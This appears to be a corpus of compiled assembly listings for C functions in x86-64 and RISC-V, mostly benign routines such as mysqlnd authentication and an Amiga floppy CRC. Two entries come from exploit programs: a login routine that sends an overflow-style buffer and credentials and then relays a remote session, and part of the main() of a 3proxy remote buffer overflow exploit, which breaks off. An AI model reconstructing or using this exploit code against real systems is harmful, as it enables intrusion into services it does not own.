.file "extr_89.c_login_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC1: .string "[*] sending username \n" .align 3 .LC2: .string "[*] sending password\n" .align 3 .LC4: .string "Connection closed by foreign host.\n" .align 3 .LC5: .string "%s" .text .align 1 .globl login .type login, @function login: addi sp,sp,-1280 la a5,__stack_chk_guard sd s0,1264(sp) addi s0,sp,8 ld a4, 0(a5) sd a4, 1208(sp) li a4, 0 sd s1,1256(sp) li a2,172 mv s1,a0 li a1,0 mv a0,s0 sd ra,1272(sp) sd s2,1248(sp) sd s3,1240(sp) sd s4,1232(sp) sd s5,1224(sp) sd s6,1216(sp) call memset@plt li a5,48 sb a5,7(sp) li a5,-2 sw a5,8(sp) li a5,-16384 addi a5,a5,-65 li a2,150 li a1,65 sh a5,12(sp) addi a0,sp,15 li a5,-61 sb a5,14(sp) call memset@plt li a5,-75 sb a5,165(sp) li a0,2 li a5,-44 sb a5,166(sp) addi s2,sp,184 call sleep@plt li a2,1024 li a1,0 mv a0,s2 call memset@plt lla a1,.LANCHOR0 mv a0,s2 call strcpy@plt lla a0,.LC1 call printf@plt mv a0,s2 call strlen@plt mv a2,a0 mv a1,s2 mv a0,s1 call sendstr@plt li a0,1 call sleep@plt lla a0,.LC2 call printf@plt li a0,2 call sleep@plt li a2,1024 li a1,0 mv a0,s2 call memset@plt mv a1,s0 mv a0,s2 call strcpy@plt lla a1,.LANCHOR0+8 mv a0,s2 call strcat@plt mv a0,s2 call strlen@plt mv a2,a0 mv a1,s2 mv a0,s1 call sendstr@plt li a0,2 call sleep@plt lla s4,.LANCHOR1 lw a0,0(s4) addi s0,sp,4 addiw s3,s1,1 call fflush@plt mv a0,s0 call FD_ZERO@plt lla s5,.LC5 lla s6,.LC4 j .L4 .L2: mv a1,s0 li a0,0 call FD_ISSET@plt bne a0,zero,.L16 .L4: mv a1,s0 mv a0,s1 call FD_SET@plt mv a1,s0 li a0,0 call FD_SET@plt mv a1,s0 li a4,0 li a3,0 li a2,0 mv a0,s3 call select@plt mv a1,s0 mv a0,s1 call FD_ISSET@plt beq a0,zero,.L2 li a2,1024 li a1,0 mv a0,s2 call memset@plt mv a1,s2 li a2,1023 mv a0,s1 call read@plt beq a0,zero,.L17 .L3: lw a0,4(s4) mv a1,s5 mv a2,s2 call fprintf@plt mv a1,s0 li a0,0 call FD_ISSET@plt beq a0,zero,.L4 .L16: li a2,1024 li a1,0 mv a0,s2 call memset@plt mv a1,s2 li a2,1023 li a0,0 call read@plt mv a2,a0 mv a1,s2 mv a0,s1 ble a2,zero,.L4 call write@plt j .L4 .L17: mv a0,s6 call printf@plt li a0,-1 call exit@plt j .L3 .size login, .-login .globl stdout .globl stderr .globl g_aug_volatile_9452 .section .rodata .align 3 .set .LANCHOR0,. + 0 .LC0: .string "xie\r\n" .string "" .zero 1 .LC3: .string "\r\n" .string "" .data .align 2 .type g_aug_volatile_9452, @object .size g_aug_volatile_9452, 4 g_aug_volatile_9452: .word 3 .bss .align 2 .set .LANCHOR1,. + 0 .type stdout, @object .size stdout, 4 stdout: .zero 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_mysqlnd_auth.c_mysqlnd_run_authentication_aug_v3_5
.file "extr_mysqlnd_auth.c_mysqlnd_run_authentication_aug_v3_5.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "n/a" .LC1: .string "mysqlnd_run_authentication" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC2: .string "The server requested authentication method unknown to the client [%s]" .align 8 .LC3: .string "The server requested authentication method unknown to the client" .section .rodata.str1.1 .LC4: .string "salt(%d)=[%.*s]" .LC5: .string "switch_to_auth_protocol=%s" .section .rodata.str1.8 .align 8 .LC6: .string "conn->error_info->error_no = %d" .section .rodata.str1.1 .LC7: .string "saving requested_protocol=%s" .text .p2align 4 .globl mysqlnd_run_authentication .type mysqlnd_run_authentication, @function mysqlnd_run_authentication: .LFB24: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movq %rdi, %rbp leaq .LC1(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $120, %rsp .cfi_def_cfa_offset 176 movq FAIL(%rip), %r14 movq %rsi, 8(%rsp) movq 208(%rsp), %rax movq 184(%rsp), %rsi movq %rdx, 16(%rsp) movq %rcx, 24(%rsp) movq 176(%rsp), %r13 movq %r8, 40(%rsp) movq 192(%rsp), %r15 movq %r9, 48(%rsp) movq %rsi, 56(%rsp) movq %rax, 32(%rsp) movq %fs:40, %rax movq %rax, 104(%rsp) xorl %eax, %eax movq TRUE(%rip), %rax movq $0, 64(%rsp) movq $0, 72(%rsp) movq %rax, (%rsp) call DBG_ENTER@PLT leaq 1(%r13), %rdi call mnd_emalloc@PLT testq %rax, %rax je .L2 movq 56(%rsp), %rsi movq %r13, %rdx movq %rax, %r12 movq %rax, %rdi movq %r13, %rbx call memcpy@PLT movb $0, (%r12,%r13) xorl %esi, %esi movq %r15, %rdi call mnd_pestrdup@PLT movq %rax, %r13 testq %rax, %rax je .L47 .L3: movq 8(%rbp), %rax movq %r13, %rdi call *8(%rax) movq %rax, %r15 testq %rax, %rax je .L48 .L4: movq $0, 80(%rsp) movq 32(%rbp), %rdi movq $0, 88(%rsp) movq $0, 96(%rsp) movq $0, 64(%rsp) movq $0, 72(%rsp) testq %rdi, %rdi je .L7 movq 0(%rbp), %rsi call mnd_pefree@PLT movq $0, 32(%rbp) .L7: movq %rbx, 40(%rbp) movq 0(%rbp), %rsi movq %rbx, %rdi call mnd_pemalloc@PLT movq %rax, 32(%rbp) movq %rax, %rdi testq %rax, %rax je .L49 movq %rbx, %rdx movq %r12, %rsi call memcpy@PLT movq %r12, %rcx movq %rbx, %rdx movq %rbx, %rsi leaq .LC4(%rip), %rdi xorl %eax, %eax call DBG_INF_FMT@PLT xorl %r11d, %r11d testq %r15, %r15 je .L10 leaq 96(%rsp), %rsi subq $8, %rsp .cfi_def_cfa_offset 184 movq %rbp, %rdx xorl %edi, %edi movl 224(%rsp), %eax pushq %rax .cfi_def_cfa_offset 192 movq 24(%rbp), %rax movl (%rax), %eax pushq %rax .cfi_def_cfa_offset 200 pushq 56(%rsp) .cfi_def_cfa_offset 208 pushq %rbx .cfi_def_cfa_offset 216 pushq %r12 .cfi_def_cfa_offset 224 movq 72(%rsp), %r9 movq 64(%rsp), %r8 movq 56(%rsp), %rcx call *(%r15) movq %rax, %r11 addq $48, %rsp .cfi_def_cfa_offset 176 .L10: movq 16(%rbp), %rax cmpq $0, (%rax) jne .L6 cmpq $0, 232(%rsp) movq 96(%rsp), %r14 je .L50 movq 8(%rsp), %rbx movq %r11, 56(%rsp) movq %rbx, %rdi call strlen@PLT movq %rbx, %rsi movq %rbp, %rdi movl %eax, %edx leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 184 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 192 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 200 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 208 pushq %r14 .cfi_def_cfa_offset 216 movq 96(%rsp), %r11 pushq %r11 .cfi_def_cfa_offset 224 movq %r11, 104(%rsp) pushq %r13 .cfi_def_cfa_offset 232 pushq 56(%rsp) .cfi_def_cfa_offset 240 pushq 288(%rsp) .cfi_def_cfa_offset 248 pushq 120(%rsp) .cfi_def_cfa_offset 256 movq 120(%rsp), %r9 movq 104(%rsp), %r8 movq 96(%rsp), %rcx call mysqlnd_auth_change_user@PLT movq 136(%rsp), %r11 addq $80, %rsp .cfi_def_cfa_offset 176 movq %rax, %r14 .L12: movq %r11, %rdi call free@PLT movq 64(%rsp), %rsi leaq .LC0(%rip), %rax leaq .LC5(%rip), %rdi testq %rsi, %rsi cmove %rax, %rsi xorl %eax, %eax call DBG_INF_FMT@PLT testq %r13, %r13 je .L14 cmpq $0, 64(%rsp) je .L14 movq %r13, %rdi call mnd_efree@PLT movq 64(%rsp), %r13 .L14: testq %r12, %r12 je .L15 movq %r12, %rdi call mnd_efree@PLT .L15: movq 16(%rbp), %rax leaq .LC6(%rip), %rdi movq 88(%rsp), %rbx movq 80(%rsp), %r12 movq (%rax), %rsi xorl %eax, %eax call DBG_INF_FMT@PLT cmpq %r14, FAIL(%rip) jne .L17 movq 16(%rbp), %rax movq (%rax), %rax movq %rax, (%rsp) testq %rax, %rax jne .L17 cmpq $0, 64(%rsp) jne .L3 .L17: cmpq %r14, PASS(%rip) je .L51 .L6: testq %r12, %r12 je .L18 movq %r12, %rdi call mnd_efree@PLT .L18: testq %r13, %r13 je .L2 movq %r13, %rdi call mnd_efree@PLT .L2: movq %r14, %rdi call DBG_RETURN@PLT movq 104(%rsp), %rax subq %fs:40, %rax jne .L52 addq $120, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L50: .cfi_restore_state leaq 88(%rsp), %rax movq %rbp, %rdi pushq %rax .cfi_def_cfa_offset 184 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 192 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 200 leaq 88(%rsp), %rax pushq %rax .cfi_def_cfa_offset 208 pushq %r14 .cfi_def_cfa_offset 216 pushq %r11 .cfi_def_cfa_offset 224 movq %r11, 104(%rsp) pushq %rbx .cfi_def_cfa_offset 232 pushq %r12 .cfi_def_cfa_offset 240 pushq %r15 .cfi_def_cfa_offset 248 pushq %r13 .cfi_def_cfa_offset 256 pushq 80(%rsp) .cfi_def_cfa_offset 264 movl 288(%rsp), %eax pushq %rax .cfi_def_cfa_offset 272 movl 312(%rsp), %eax pushq %rax .cfi_def_cfa_offset 280 pushq 136(%rsp) .cfi_def_cfa_offset 288 movq 160(%rsp), %r9 movq 152(%rsp), %r8 movq 136(%rsp), %rcx movq 128(%rsp), %rdx movq 120(%rsp), %rsi call mysqlnd_auth_handshake@PLT addq $112, %rsp .cfi_def_cfa_offset 176 movq 56(%rsp), %r11 movq %rax, %r14 jmp .L12 .p2align 4,,10 .p2align 3 .L48: cmpq $0, (%rsp) je .L5 movq %r13, %rdi xorl %esi, %esi call mnd_pefree@PLT xorl %esi, %esi xorl %edi, %edi call mnd_pestrdup@PLT movq %rax, %r13 jmp .L4 .p2align 4,,10 .p2align 3 .L51: movq %r13, %rsi leaq .LC7(%rip), %rdi xorl %eax, %eax call DBG_INF_FMT@PLT movq 8(%rbp), %rax movq %r13, %rdx movq %rbp, %rdi movl MYSQLND_OPT_AUTH_PROTOCOL(%rip), %esi call *(%rax) jmp .L6 .p2align 4,,10 .p2align 3 .L47: movq %r12, %rdi call mnd_efree@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L49: movq 16(%rbp), %rdi call SET_OOM_ERROR@PLT jmp .L6 .L5: movl E_WARNING(%rip), %esi movq %r13, %rcx xorl %edi, %edi leaq .LC2(%rip), %rdx call php_error_docref@PLT movq 16(%rbp), %rdi movl UNKNOWN_SQLSTATE(%rip), %edx leaq .LC3(%rip), %rcx movl CR_NOT_IMPLEMENTED(%rip), %esi call SET_CLIENT_ERROR@PLT jmp .L6 .L52: call __stack_chk_fail@PLT .cfi_endproc .LFE24: .size mysqlnd_run_authentication, .-mysqlnd_run_authentication .globl UNKNOWN_SQLSTATE .bss .align 4 .type UNKNOWN_SQLSTATE, @object .size UNKNOWN_SQLSTATE, 4 UNKNOWN_SQLSTATE: .zero 4 .globl TRUE .align 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .globl PASS .align 8 .type PASS, @object .size PASS, 8 PASS: .zero 8 .globl MYSQLND_OPT_AUTH_PROTOCOL .align 4 .type MYSQLND_OPT_AUTH_PROTOCOL, @object .size MYSQLND_OPT_AUTH_PROTOCOL, 4 MYSQLND_OPT_AUTH_PROTOCOL: .zero 4 .globl MYSQLND_DEFAULT_AUTH_PROTOCOL .section .rodata .align 8 .type MYSQLND_DEFAULT_AUTH_PROTOCOL, @object .size MYSQLND_DEFAULT_AUTH_PROTOCOL, 8 MYSQLND_DEFAULT_AUTH_PROTOCOL: .zero 8 .globl FALSE .align 8 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .globl FAIL .bss .align 8 .type FAIL, @object .size FAIL, 8 FAIL: .zero 8 .globl E_WARNING .align 4 .type E_WARNING, @object .size E_WARNING, 4 E_WARNING: .zero 4 .globl CR_NOT_IMPLEMENTED .align 4 .type CR_NOT_IMPLEMENTED, @object .size CR_NOT_IMPLEMENTED, 4 CR_NOT_IMPLEMENTED: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_mysqlnd_auth.c_mysqlnd_run_authentication_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "n/a" .align 3 .LC1: .string "mysqlnd_run_authentication" .align 3 .LC2: .string "The server requested authentication method unknown to the client [%s]" .align 3 .LC3: .string "The server requested authentication method unknown to the client" .align 3 .LC4: .string "salt(%d)=[%.*s]" .align 3 .LC5: .string "switch_to_auth_protocol=%s" .align 3 .LC6: .string "conn->error_info->error_no = %d" .align 3 .LC7: .string "saving requested_protocol=%s" .text .align 1 .globl mysqlnd_run_authentication .type mysqlnd_run_authentication, @function mysqlnd_run_authentication: addi sp,sp,-352 sd s1,328(sp) lw s1,360(sp) sd a4,112(sp) la a4,__stack_chk_guard sd s1,128(sp) ld s1,368(sp) sd s0,336(sp) sd s7,280(sp) sd s1,96(sp) lw s1,376(sp) lla s7,.LANCHOR0 sd a5,120(sp) mv s0,a0 ld a5, 0(a4) sd a5, 232(sp) li a5, 0 lla a0,.LC1 sd s2,320(sp) sd s3,312(sp) sd s4,304(sp) sd s6,288(sp) sd s8,272(sp) sd s9,264(sp) sd s10,256(sp) sd ra,344(sp) sd s5,296(sp) sd s11,248(sp) ld s3,352(sp) ld s4,0(s7) ld s10,8(s7) sd a6,176(sp) sd a7,184(sp) sd s1,104(sp) mv s6,a1 mv s8,a2 mv s9,a3 sd zero,192(sp) sd zero,200(sp) call DBG_ENTER@plt ld s2,176(sp) addi a0,s2,1 call mnd_emalloc@plt beq a0,zero,.L2 ld a1,184(sp) mv a2,s2 mv s1,a0 call memcpy@plt add a5,s1,s2 mv a0,s3 sb zero,0(a5) li a1,0 call mnd_pestrdup@plt mv s3,a0 beq a0,zero,.L46 addi a5,sp,216 sd a5,136(sp) addi a5,sp,208 sd a5,144(sp) addi a5,sp,200 sd a5,152(sp) addi a5,sp,192 addi s11,sp,224 sd a5,160(sp) .L3: ld a5,8(s0) mv a0,s3 ld a5,8(a5) jalr a5 mv s5,a0 beq a0,zero,.L49 .L4: ld a0,32(s0) sd zero,208(sp) sd zero,216(sp) sd zero,224(sp) sd zero,192(sp) sd zero,200(sp) beq a0,zero,.L7 ld a1,0(s0) call mnd_pefree@plt sd zero,32(s0) .L7: ld a1,0(s0) sd s2,40(s0) mv a0,s2 call mnd_pemalloc@plt sd a0,32(s0) beq a0,zero,.L50 mv a2,s2 mv a1,s1 call memcpy@plt mv a3,s1 mv a2,s2 mv a1,s2 lla a0,.LC4 call DBG_INF_FMT@plt li t1,0 beq s5,zero,.L10 ld a4,104(sp) ld a5,24(s0) mv a7,s2 sd a4,16(sp) lw a5,0(a5) ld a4,96(sp) mv a6,s1 sd a5,8(sp) sd a4,0(sp) ld t1,0(s5) mv a5,s9 mv a4,s8 mv a3,s6 mv a2,s0 mv a1,s11 li a0,0 jalr t1 mv t1,a0 .L10: ld a5,16(s0) ld a5,0(a5) bne a5,zero,.L6 ld a5,392(sp) beq a5,zero,.L51 mv a0,s6 sd t1,168(sp) call strlen@plt ld a5,136(sp) ld t1,168(sp) ld a7,384(sp) sd a5,56(sp) ld a5,144(sp) ld a6,120(sp) mv a2,a0 sd a5,48(sp) ld a5,152(sp) mv a1,s6 sd t1,16(sp) sd a5,40(sp) ld a5,160(sp) mv a4,s9 mv a3,s8 sd a5,32(sp) ld a5,224(sp) sd s3,8(sp) sd s10,0(sp) sd a5,24(sp) ld a5,112(sp) mv a0,s0 call mysqlnd_auth_change_user@plt ld t1,168(sp) mv s4,a0 mv a0,t1 call free@plt ld a1,192(sp) beq a1,zero,.L52 .L13: lla a0,.LC5 call DBG_INF_FMT@plt beq s3,zero,.L14 ld a5,192(sp) beq a5,zero,.L14 mv a0,s3 call mnd_efree@plt ld s3,192(sp) .L14: beq s1,zero,.L15 mv a0,s1 call mnd_efree@plt .L15: ld a5,16(s0) lla a0,.LC6 ld s2,216(sp) ld a1,0(a5) ld s1,208(sp) call DBG_INF_FMT@plt ld a5,0(s7) bne a5,s4,.L17 ld a5,16(s0) ld s10,0(a5) bne s10,zero,.L17 ld a5,192(sp) bne a5,zero,.L3 .L17: ld a5,32(s7) beq a5,s4,.L53 .L6: beq s1,zero,.L18 mv a0,s1 call mnd_efree@plt .L18: beq s3,zero,.L2 mv a0,s3 call mnd_efree@plt .L2: mv a0,s4 call DBG_RETURN@plt la a5,__stack_chk_guard ld a4, 232(sp) ld a5, 0(a5) xor a5, a4, a5 li a4, 0 bne a5,zero,.L54 ld ra,344(sp) ld s0,336(sp) ld s1,328(sp) ld s2,320(sp) ld s3,312(sp) ld s4,304(sp) ld s5,296(sp) ld s6,288(sp) ld s7,280(sp) ld s8,272(sp) ld s9,264(sp) ld s10,256(sp) ld s11,248(sp) li a0,0 addi sp,sp,352 jr ra .L51: ld a5,136(sp) ld a7,104(sp) ld a6,96(sp) sd a5,88(sp) ld a5,144(sp) ld a4,112(sp) mv a1,s6 sd a5,80(sp) ld a5,152(sp) sd t1,48(sp) mv a3,s9 sd a5,72(sp) ld a5,160(sp) mv a2,s8 sd s2,40(sp) sd a5,64(sp) ld a5,224(sp) sd s1,32(sp) sd s5,24(sp) sd a5,56(sp) ld a5,128(sp) sd s3,16(sp) sd s10,8(sp) sd a5,0(sp) ld a5,120(sp) mv a0,s0 sd t1,168(sp) call mysqlnd_auth_handshake@plt ld t1,168(sp) mv s4,a0 mv a0,t1 call free@plt ld a1,192(sp) bne a1,zero,.L13 .L52: lla a1,.LC0 j .L13 .L49: beq s10,zero,.L5 li a1,0 mv a0,s3 call mnd_pefree@plt li a1,0 li a0,0 call mnd_pestrdup@plt mv s3,a0 j .L4 .L53: mv a1,s3 lla a0,.LC7 call DBG_INF_FMT@plt ld a5,8(s0) lw a1,40(s7) mv a2,s3 ld a5,0(a5) mv a0,s0 jalr a5 j .L6 .L46: mv a0,s1 call mnd_efree@plt j .L2 .L50: ld a0,16(s0) call SET_OOM_ERROR@plt j .L6 .L5: lw a1,16(s7) mv a3,s3 lla a2,.LC2 call php_error_docref@plt lw a2,20(s7) lw a1,24(s7) ld a0,16(s0) lla a3,.LC3 call SET_CLIENT_ERROR@plt j .L6 .L54: call __stack_chk_fail@plt .size mysqlnd_run_authentication, .-mysqlnd_run_authentication .globl UNKNOWN_SQLSTATE .globl TRUE .globl PASS .globl MYSQLND_OPT_AUTH_PROTOCOL .globl MYSQLND_DEFAULT_AUTH_PROTOCOL .globl FALSE .globl FAIL .globl E_WARNING .globl CR_NOT_IMPLEMENTED .section .rodata .align 3 .type MYSQLND_DEFAULT_AUTH_PROTOCOL, @object .size MYSQLND_DEFAULT_AUTH_PROTOCOL, 8 MYSQLND_DEFAULT_AUTH_PROTOCOL: .zero 8 .type FALSE, @object .size FALSE, 8 FALSE: .zero 8 .bss .align 3 .set .LANCHOR0,. + 0 .type FAIL, @object .size FAIL, 8 FAIL: .zero 8 .type TRUE, @object .size TRUE, 8 TRUE: .zero 8 .type E_WARNING, @object .size E_WARNING, 4 E_WARNING: .zero 4 .type UNKNOWN_SQLSTATE, @object .size UNKNOWN_SQLSTATE, 4 UNKNOWN_SQLSTATE: .zero 4 .type CR_NOT_IMPLEMENTED, @object .size CR_NOT_IMPLEMENTED, 4 CR_NOT_IMPLEMENTED: .zero 4 .zero 4 .type PASS, @object .size PASS, 8 PASS: .zero 8 .type MYSQLND_OPT_AUTH_PROTOCOL, @object .size MYSQLND_OPT_AUTH_PROTOCOL, 4 MYSQLND_OPT_AUTH_PROTOCOL: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_amiflop.c_dos_crc_aug_v3_4
.file "extr_amiflop.c_dos_crc_aug_v3_4.c" .text .p2align 4 .type dos_crc, @function dos_crc: .LFB25: .cfi_startproc endbr64 movl %edx, %eax testl %ecx, %ecx jle .L1 leal -1(%rcx), %edx leaq CRCTable1.1(%rip), %r9 notq %rdx leaq CRCTable2.0(%rip), %r8 addq %rdi, %rdx .p2align 4,,10 .p2align 3 .L3: xorb (%rdi), %sil subq $1, %rdi movzbl %sil, %ecx xorb (%r9,%rcx), %al movl %eax, %esi movzbl (%r8,%rcx), %eax cmpq %rdx, %rdi jne .L3 .L1: ret .cfi_endproc .LFE25: .size dos_crc, .-dos_crc .data .align 32 .type CRCTable2.0, @object .size CRCTable2.0, 256 CRCTable2.0: .string "" .ascii "!Bc\204\245\306\347\b)Jk\214\255\316\3571\020sR\265\224\367\326" .ascii "9\030{Z\275\234\377\336bC \001\346\307\244\205jK(\t\356\317\254" .ascii "\215Sr\0210\327\366\225\264[z\0318\337\376\235\274\304\345\206" .ascii "\247@a\002#\314\355\216\257Hi\n+\365\324\267\226qP3\022\375\334" .ascii "\277\236yX;\032\246\207\344\305\"\003`A\256\217\354\315*\013" .ascii "hI\227\266\325\364\0232Qp\237\276\335\374\033:Yx\210\251\312" .ascii "\353\f-No\200\241\302\343\004%Fg\271\230\373\332=\034\177^\261" .ascii "\220\363\3225\024wV\352\313\250\211nO,\r\342\303\240\201fG$\005" .ascii "\333\372\231\270_~\035<\323\362\221\260Wv\0254Lm\016/\310\351" .ascii "\212\253De\006'\300\341\202\243}\\?\036\371\330\273\232uT7\026" .ascii "\361\320\263\222.\017lM\252\213\350\311&\007dE\242\203\340\301" .ascii "\037>]|\233\272\331\370\0276Ut\223\262\321\360" .align 32 .type CRCTable1.1, @object .size CRCTable1.1, 256 CRCTable1.1: .string "" .string "\020 0@P`p\201\221\241\261\301\321\341\361\022\0022\"RBrb\223\203\263\243\323\303\363\343$4\004\024dtDT\245\265\205\225\345\365\305\3256&\026\006vfVF\267\247\227\207\367\347\327\307HXhx\b\030(8\311\331\351\371\211\231\251\271ZJzj\032\n:*\333\313\373\353\233\213\273\253l|L\\,<\f\034\355\375\315\335\255\275\215\235~n^N>.\036\016\377\357\337\317\277\257\237\217\221\201\261\241\321\301\361\341\020" .ascii "0 P@p`\203\223\243\263\303\323\343\363\002\022\"2BRbr\265\245" .ascii "\225\205\365\345\325\3054$\024\004tdTD\247\267\207\227\347\367" .ascii "\307\327&6\006\026fvFV\331\311\371\351\231\211\271\251XHxh\030" .ascii "\b8(\313\333\353\373\213\233\253\273JZjz\n\032*:\375\355\335" .ascii "\315\275\255\235\215|l\\L<,\034\f\357\377\317\337\257\277\217" .ascii "\237n~N^.>\016\036" .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_amiflop.c_dos_crc_aug_v3_4.c" .option pic .text .align 1 .type dos_crc, @function dos_crc: mv a5,a0 andi a1,a1,0xff andi a0,a2,0xff ble a3,zero,.L2 addiw a3,a3,-1 slli a3,a3,32 srli a3,a3,32 not a3,a3 add a3,a5,a3 lla a2,.LANCHOR0 .L3: lbu a4,0(a5) addi a5,a5,-1 xor a1,a1,a4 add a4,a2,a1 lbu a1,0(a4) xor a1,a0,a1 lbu a0,256(a4) bne a5,a3,.L3 .L2: ret .size dos_crc, .-dos_crc .data .align 3 .set .LANCHOR0,. + 0 .type CRCTable1.1, @object .size CRCTable1.1, 256 CRCTable1.1: .string "" .string "\020 0@P`p\201\221\241\261\301\321\341\361\022\0022\"RBrb\223\203\263\243\323\303\363\343$4\004\024dtDT\245\265\205\225\345\365\305\3256&\026\006vfVF\267\247\227\207\367\347\327\307HXhx\b\030(8\311\331\351\371\211\231\251\271ZJzj\032\n:*\333\313\373\353\233\213\273\253l|L\\,<\f\034\355\375\315\335\255\275\215\235~n^N>.\036\016\377\357\337\317\277\257\237\217\221\201\261\241\321\301\361\341\020" .ascii "0 P@p`\203\223\243\263\303\323\343\363\002\022\"2BRbr\265\245" .ascii "\225\205\365\345\325\3054$\024\004tdTD\247\267\207\227\347\367" .ascii "\307\327&6\006\026fvFV\331\311\371\351\231\211\271\251XHxh\030" .ascii "\b8(\313\333\353\373\213\233\253\273JZjz\n\032*:\375\355\335" .ascii "\315\275\255\235\215|l\\L<,\034\f\357\377\317\337\257\277\217" .ascii "\237n~N^.>\016\036" .type CRCTable2.0, @object .size CRCTable2.0, 256 CRCTable2.0: .string "" .ascii "!Bc\204\245\306\347\b)Jk\214\255\316\3571\020sR\265\224\367\326" .ascii "9\030{Z\275\234\377\336bC \001\346\307\244\205jK(\t\356\317\254" .ascii "\215Sr\0210\327\366\225\264[z\0318\337\376\235\274\304\345\206" .ascii "\247@a\002#\314\355\216\257Hi\n+\365\324\267\226qP3\022\375\334" .ascii "\277\236yX;\032\246\207\344\305\"\003`A\256\217\354\315*\013" .ascii "hI\227\266\325\364\0232Qp\237\276\335\374\033:Yx\210\251\312" .ascii "\353\f-No\200\241\302\343\004%Fg\271\230\373\332=\034\177^\261" .ascii "\220\363\3225\024wV\352\313\250\211nO,\r\342\303\240\201fG$\005" .ascii "\333\372\231\270_~\035<\323\362\221\260Wv\0254Lm\016/\310\351" .ascii "\212\253De\006'\300\341\202\243}\\?\036\371\330\273\232uT7\026" .ascii "\361\320\263\222.\017lM\252\213\350\311&\007dE\242\203\340\301" .ascii "\037>]|\233\272\331\370\0276Ut\223\262\321\360" .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_3822.c_main_aug_v3_3
.file "extr_3822.c_main_aug_v3_3.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n" .align 8 .LC1: .string "main(): allocating memory failed" .section .rodata.str1.1,"aMS",@progbits,1 .LC2: .string "%x" .LC3: .string "h:p:r:" .LC4: .string "[*] target: %s:%d\n" .section .rodata.str1.8 .align 8 .LC5: .string "[*] return address($eip/\"CALL ESP\"): 0x%.8x\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 leaq .LC1(%rip), %r15 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 leaq 4+tbl(%rip), %r14 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 leaq .LC2(%rip), %r13 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 leaq .LC3(%rip), %r12 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 movl %edi, %ebp leaq .LC0(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 movq %rsi, %rbx subq $8, %rsp .cfi_def_cfa_offset 64 movl g_aug_volatile_4700(%rip), %eax addl $1, %eax movl %eax, g_aug_volatile_4700(%rip) call puts@PLT movl DFL_PORT(%rip), %eax movl %eax, tbl(%rip) movl DFL_RETADDR(%rip), %eax movl %eax, 4+tbl(%rip) .p2align 4,,10 .p2align 3 .L2: movq %r12, %rdx movq %rbx, %rsi movl %ebp, %edi call getopt@PLT cmpl %eax, EOF(%rip) je .L14 cmpl $112, %eax je .L3 cmpl $114, %eax je .L4 cmpl $104, %eax je .L15 movq (%rbx), %rdi call usage@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L3: movl optarg(%rip), %edi call atoi@PLT movl %eax, tbl(%rip) jmp .L2 .p2align 4,,10 .p2align 3 .L15: cmpq $0, 8+tbl(%rip) jne .L2 movl optarg(%rip), %edi call strdup@PLT movq %rax, 8+tbl(%rip) testq %rax, %rax jne .L2 movl $1, %esi movq %r15, %rdi call printe@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L4: movl optarg(%rip), %edi movq %r14, %rdx movq %r13, %rsi call sscanf@PLT jmp .L2 .p2align 4,,10 .p2align 3 .L14: movq 8+tbl(%rip), %rsi testq %rsi, %rsi je .L16 .L10: movl tbl(%rip), %edx leaq .LC4(%rip), %rdi xorl %eax, %eax call 